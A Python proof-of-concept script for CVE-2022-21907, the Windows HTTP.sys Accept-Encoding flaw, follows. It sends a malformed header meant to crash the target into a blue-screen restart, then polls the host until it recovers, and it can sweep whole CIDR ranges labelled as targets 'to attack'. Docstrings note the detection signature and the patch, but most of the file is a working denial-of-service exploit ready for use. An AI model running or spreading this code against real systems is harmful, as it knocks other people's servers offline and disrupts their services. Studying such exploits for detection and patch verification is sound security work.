# Created by antx at 2022-01-17.
# integrated by Michele "[email protected]" just for fun, on 23.01.2022
import requests
from loguru import logger
import time
import argparse
from ipaddress import ip_network
# Browser-like User-Agent attached to the plain probe requests
# (first_handshake / verify_handshake); poc() sends its own headers.
header = {
    "User-Agent": (
        "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 "
        "(KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36"
    ),
}
class CVE_2022_21907():
    """Network check for the HTTP.sys Accept-Encoding parsing flaw tracked as CVE-2022-21907.

    Workflow (see dia()): a plain GET confirms the host answers, poc() sends a
    single request carrying a malformed Accept-Encoding value, and
    verify_handshake() is polled until the host accepts connections again.
    A host affected by the flaw stops answering after the malformed request;
    a patched host answers it like any other request. From a defensive
    standpoint the probe is distinguishable only by that header value, and
    the remedy is the vendor security update for CVE-2022-21907.

    Every method is wrapped in ``@logger.catch(level='ERROR')``: an exception
    that escapes a method body is logged by loguru instead of propagating,
    and the caller receives the decorator's fallback value instead of a bool
    (presumably None - TODO confirm against the loguru version in use).
    """

    @logger.catch(level='ERROR')
    def first_handshake(self, target: str) -> bool:
        """Return True when a plain GET to *target* answers with HTTP 200.

        Uses the module-level browser-like ``header`` and a 10 s timeout.
        Any other status code, and any exception raised by the request
        (connection refused, DNS failure, timeout, ...), yields False.
        """
        try:
            resp = requests.get(target, headers=header, timeout=10)
            if resp.status_code == 200:
                logger.info(f'The first handshake: the target host is normal and can be verified by POC')
                return True
            logger.info(f'First handshake: the target host is normal, but returns an exception, status code: {resp.status_code}')
            return False
        except Exception as e:
            logger.info(f'First handshake error: The target host is abnormal, please check whether the target host is alive, error resp: {e}')
            return False

    @logger.catch(level='ERROR')
    def verify_handshake(self, target: str) -> bool:
        """Return True when *target* currently refuses connections, False when it answers.

        Any completed response (200 or otherwise) means the host is reachable
        and yields False. Only ``requests.exceptions.ConnectionError`` is
        mapped to True; any other exception (e.g. a ReadTimeout) is not
        caught here and falls through to the ``@logger.catch`` decorator.
        """
        try:
            resp = requests.get(target, headers=header, timeout=10)
            if resp.status_code == 200:
                logger.info(f'Verification result: The target host has restarted and returned to normal')
                return False
            logger.info(f'Verification result: The target host has restarted and returned to normal, but returned an exception with a status code: {resp.status_code}')
            return False
        except requests.exceptions.ConnectionError as e:
            logger.info(f'Verification result: The verification is successful, the target host is abnormal, has been exploited and entered the blue screen restart')
            return True

    @logger.catch(level='ERROR')
    def poc(self, target: str) -> bool:
        """Send one GET with a malformed Accept-Encoding value and report how the host reacted.

        A completed response of any status is taken as "not affected /
        patched" and yields False. A ``requests.exceptions.ReadTimeout``
        (the host accepted the connection but never answered) is taken as
        the host having stopped responding and yields True. A
        ``ConnectionError`` is not caught here and falls through to the
        ``@logger.catch`` decorator.

        Detection note: this header value is the only thing that sets the
        request apart from an ordinary GET, so it is what request-logging
        or IDS rules for CVE-2022-21907 would key on.
        """
        # headers = {'Accept-Encoding': 'doar-e, ftw, imo, ,'} # CVE-2021-31166
        headers = {
            'Accept-Encoding': 'AAAAAAAAAAAAAAAAAAAAAAAA, '
                               'BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S, '
                               'RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF, '
                               'TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP, '
                               'OOOAOAOOOAOOAOOOAOOOAOOOAOO, '
                               '****************************stupiD, *, ,'
        }  # CVE-2022-21907
        try:
            r = requests.get(target, headers=headers, timeout=10)
            logger.info(f'POC handshake failed: {target} does not exist CVE-2022-21907 Vulnerability, may have been patched')
            return False
        except requests.exceptions.ReadTimeout as e:
            logger.info(f'POC handshake success: {target} maybe can Exploit!')
            return True

    @logger.catch(level='ERROR')
    def dia(self, url: str) -> None:
        """Run the full check against *url* and log the verdict.

        URL normalisation: a value that does not contain the substring
        'http' is prefixed with 'http://'; a value containing 'https' has
        every occurrence of 'https' replaced by 'http' (``str.replace`` is
        not anchored to the scheme); anything else is used as given.
        Note that ``'http' not in url`` is a substring test, so a bare host
        whose name happens to contain 'http' would not get the prefix.

        Flow: abort unless first_handshake() succeeds; call poc(); then poll
        verify_handshake() every 10 s until it returns a falsy value, and log
        the "vulnerable" line.

        NOTE(review): the return value of poc() is discarded, so the polling
        loop and the final message are reached even when poc() reported
        "patched"; and because the loop stops on the first falsy result,
        a decorator fallback from verify_handshake() (presumably None) also
        ends it with the same message. Both are false-positive paths.
        """
        if 'http' not in url:
            target = f'http://{url}'
        elif 'https' in url:
            target = url.replace('https', 'http')
        else:
            target = url
        logger.info(f'start verification: {target}')
        if not self.first_handshake(target):
            logger.info(f'{target} does not exist CVE-2022-21907 Vulnerability')
            return
        self.poc(target)  # result ignored - see NOTE(review) in the docstring
        logger.info(f'Deterministic verification again')
        while True:
            time.sleep(10)  # poll interval between reachability checks
            if not self.verify_handshake(target):
                break
        logger.info(f'{target} have CVE-2022-21907 vulnerability, can be exploited!')
if __name__ == '__main__':
    # Command-line driver: either one URL (-u) or a CIDR range (-i) whose
    # host addresses are handed to CVE_2022_21907.dia() one by one. Both
    # options are optional; when neither is given a hint is printed and no
    # target is contacted. -i takes precedence when both are supplied.
    parser = argparse.ArgumentParser(description='CVE-2022-21907 PoC')
    parser.add_argument('-i', '--ip', help='IPs (CIDR) to attack', required=False)
    parser.add_argument('-u', '--url', help='URL to attack', required=False)
    args = parser.parse_args()

    if not (args.ip or args.url):
        print("Please use -i or -u to specify target(s)!")

    # default debug level: just errors!
    cve = CVE_2022_21907()
    if args.ip:
        for host in ip_network(args.ip).hosts():
            cve.dia(str(host))
    elif args.url:
        cve.dia(str(args.url))